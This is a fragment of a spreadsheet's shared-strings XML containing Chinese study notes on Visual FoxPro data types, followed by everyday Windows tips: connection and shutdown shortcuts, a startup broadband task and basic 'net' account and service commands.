        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：在使用货币值时，可以使用货币型来代替数值型。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (3)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日期型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Date)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用以保存不带时间的日期值。</t>
    </r>
  </si>
  <si>
    <r>
      <t>日期型数据的存储格式为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“yyyymmdd”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>yyyy</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为年，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>mm</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为月，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>dd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为日，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位。</t>
    </r>
  </si>
  <si>
    <r>
      <t>日期型数据的表示有多种格式，最常用的格式为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>mm/dd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>／</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>yyyy</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日期时间型数据中可以只包含一个日期或者只包含一个时间值，缺省日期值时，系统自动加上</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1999</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>12</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>月</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>31</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日，省略时间值时，则自动加上午夜零点。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (5)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逻辑型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Logical)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用于存储只有两个值的数据。存入的值只有真</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(.T.)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和假</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(.F.)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两种状态，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (6)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数值型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Numeric)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用来表示数量，它由数字</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、一个符号</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＋或－</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和一个小数点</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(.)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组成。数值型数据的长度为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>20</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，每个数据占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (8)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮点型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Float)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：只能用于数据表中字段的定义，包含此类型是为了提供兼容性，浮点型在功能上与数值型等价。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (9)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(General)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用于存储</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OLE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对象，只能用于数据表中字段的定义。该字段包含了对</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OLE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对象的引用，而</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OLE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对象的具体内容可以是一个电子表格、一个字处理器的文本、图片等，是由其他应用软件建立的。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (10)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Integer)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用于存储无小数部分的数值，只能用于数据表中字段的定义。在数据表中，整型字段占用</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节，取值范围是：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">   -2147483647</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2147483647</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整型以二进制形式存储，不像数值型那样需要转换成</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ASCII</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>字符存储。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (11)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备注型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Memo)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；备注型用于字符型数据块的存储，只能用于数据表中字段的定义。在数据表中，备注型字段占用</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节，并用这</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节来引用备注的实际内容。实际备注内容的多少只受内存可用空间的限制。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备注型字段的实际内容变化很大，不能直接将备注内容存在数据表</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(.DBF)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统将备注内容存放在一个相对独立的文件中，该文件的扩展名为．</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DBT</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>由于没有备注型的变量，所以对备注型字段的处理，需转换成字符型变量，然后使用字符型函数进行处理。</t>
    </r>
  </si>
  <si>
    <t>对象的属性、事件、方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可在桌面创建快捷方式：target:C:\Windows\System32\rasphone.exe -d "broadband connection 3";</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>"broadband connection"右击---properties---options tab:1 display progress while connecting,when connectting ,display connection progress.2 prompt or name and password,certificate,etc.:display connection dialogue.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速强制关机的快捷方式：target:shutdown.exe -s -t 0</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第四：选中</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>"当单击</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>’</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>完成</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>’</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时，打开此任务的对话框</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>"复选框，单击：“完成</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>．</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第五：随后打开</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开机自动宽带连接属性</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对话框．切换至</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发器</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”(trigger)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项．单击下方的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编辑</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>．</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第六：选择</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延迟任务时间</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复选框，手动将时间修改为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>秒．不建议设置为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>秒，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>秒以上为好～因为猫跟电脑有连接的过程！</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net user </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>帐户名：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看帐户的属性</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>net user</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看有哪些用户</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net localgroup administrators </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /add </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：把“用户”添加到管理员中使其具有管理员权限</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注意：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>administrator</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后加</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>s</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用复数</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net start </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：查看开启了哪些服务</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net view </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：查看本地局域网内开启了哪些共享</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>net logoff</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>断开连接的共享</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
